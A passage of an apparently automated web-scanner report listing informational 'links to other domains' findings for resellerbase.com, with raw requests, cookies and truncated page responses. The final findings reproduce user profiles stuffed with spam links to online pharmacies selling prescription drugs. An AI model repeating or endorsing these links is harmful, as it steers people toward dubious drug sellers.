<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.301. http://www.resellerbase.com/tag/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.302. http://www.resellerbase.com/tag/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /tag/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.303. http://www.resellerbase.com/tags.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/tags.php?&ltr=%23

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /tags.php?&ltr=%23 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:26:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tag Clouds [#]</titl
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.304. http://www.resellerbase.com/tell_friend.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tell_friend.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/tell_friend.php?id=29

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /tell_friend.php?id=29 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=5
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.305. http://www.resellerbase.com/travel-vaccation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.306. http://www.resellerbase.com/travel-vaccation/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/travel-vaccation/googlepr.php?link_id=20

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /travel-vaccation/googlepr.php?link_id=20 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.307. http://www.resellerbase.com/travel-vaccation/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/travel-vaccation/search.php?cat=12&keyword=search...&Submit3=Search&opt=1

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.ian.com/ian/signup/home.jsp?cid=104772

Request

GET /travel-vaccation/search.php?cat=12&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:42:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 20530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.ian.com/ian/signup/home.jsp?cid=104772" name="link_20"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.ian.com/ian/signup/home.jsp?cid=104772" name="link_20"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.308. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.309. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.310. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.311. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.312. http://www.resellerbase.com/travel-vaccation/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/travel-vaccation/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.313. http://www.resellerbase.com/upgrade.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/upgrade.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/upgrade.php?id=555-555-0199@example.com&pflag=retrieve&submit=Submit

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /upgrade.php?id=555-555-0199@example.com&pflag=retrieve&submit=Submit HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/upgrade.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Upgrade a Listing</t
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.314. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=iabuni

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.buy-fioricet-generic.com/
http://www.fioricet-40mg-generic.com/
http://www.fioricet-buyonline.com/
http://www.fioricet-fiorcet.com/
http://www.fioricet-generic.com/
http://www.fioricet-order.com/
http://www.fioricet-pain-relief.com/
http://www.fioricet-rx.com/
http://www.fioricet40mg.com/
http://www.fioricetcheap.com/
http://www.fioricetdiscount.com/
http://www.fioricetprice.com/
http://www.fioricetsupply.com/
http://www.prescription-fioricet.com/

Request

GET /user_detail.php?u=iabuni HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:06:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 13639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.fioricet-rx.com/">http://www.fioricet-rx.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.fioricet-buyonline.com">Fioricet Buy Online</a> | <a href="http://www.fioricet-order.com">Fioricet Order</a> | <a href="http://www.fioricet-40mg-generic.com">Fioricet 40 mg Generic</a> | <a href="http://www.fioricetsupply.com"> Fioricet Supply </a> | <a href="http://www.fioricetcheap.com"> Fioricet Cheap </a> | <a href="http://www.fioricet40mg.com"> Fioricet 40 mg </a>|<a href="http://www.fioricet-generic.com"> Fioricet Generic </a> | <a href="http://www.fioricetdiscount.com/"> Fioricet Discount </a> | <a href="http://www.fioricet-pain-relief.com"> Fioricet Pain Relief</a> | <a href="http://www.prescription-fioricet.com"> Prescription Fioricet </a> | <a href="http://www.buy-fioricet-generic.com"> Buy Fioricet Generic</a> | <a href="http://www.fioricet-fiorcet.com/"> Fioricet Fiorcet </a> | <a href="http://www.fioricetprice.com"> Fioricet Price</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.315. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=uingr

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.4life-health.com/
http://www.approvedpillsource.info/
http://www.approvedrx.info/
http://www.bewellbehealthy.com/
http://www.brandnamerx.info/
http://www.brandrx.info/
http://www.buying-rx.com/
http://www.buying-rx.com/cart.php?action=view_cat&id=1
http://www.buying-rx.com/cart.php?action=view_cat&id=10
http://www.buying-rx.com/cart.php?action=view_cat&id=104
http://www.buying-rx.com/cart.php?action=view_cat&id=11
http://www.buying-rx.com/cart.php?action=view_cat&id=174
http://www.buying-rx.com/cart.php?action=view_cat&id=5
http://www.buying-rx.com/cart.php?action=view_cat&id=69
http://www.buying-rx.com/cart.php?action=view_cat&id=7
http://www.buying-rx.com/cart.php?action=view_cat&id=74
http://www.buying-rx.com/cart.php?action=view_cat&id=76
http://www.eprescription-drug.com/
http://www.online-antibiotics.info/
http://www.sexy-pharmacy.com/

Request

GET /user_detail.php?u=uingr HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:16:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.buying-rx.com/">http://www.buying-rx.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.bewellbehealthy.com">Be Well Be Healthy</a> | <a href="http://www.4life-health.com">4 Life Health</a> | <a href="http://www.eprescription-drug.com">E Prescription Drug</a> | <a href="http://www.online-antibiotics.info"> Online Antibiotics</a> | <a href="http://www.approvedpillsource.info">Approved Pill Source </a> | <a href="http://www.approvedrx.info"> Approved Rx </a> | <a href="http://www.SEXY-PHARMACY.COM"> Sexy Pharmacy </a> |<a href="http://www.brandnamerx.info"> Brand Name Rx</a> | <a href="http://www.brandrx.info"> Brand Rx </a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=104">Allergy Products</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=1">Buy Anti Depressants</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=10">Get Antibiotics</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=69">Order Asthma Products</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=5">Blood Presure</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=7">Diabetes Pills</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=76">Formigran, Maxalt, Migraeflux, Pirazetam</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=174">Adekin For Parkinson</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=11">Sleep & Insomnia - Novanox, Planum</a> | <a 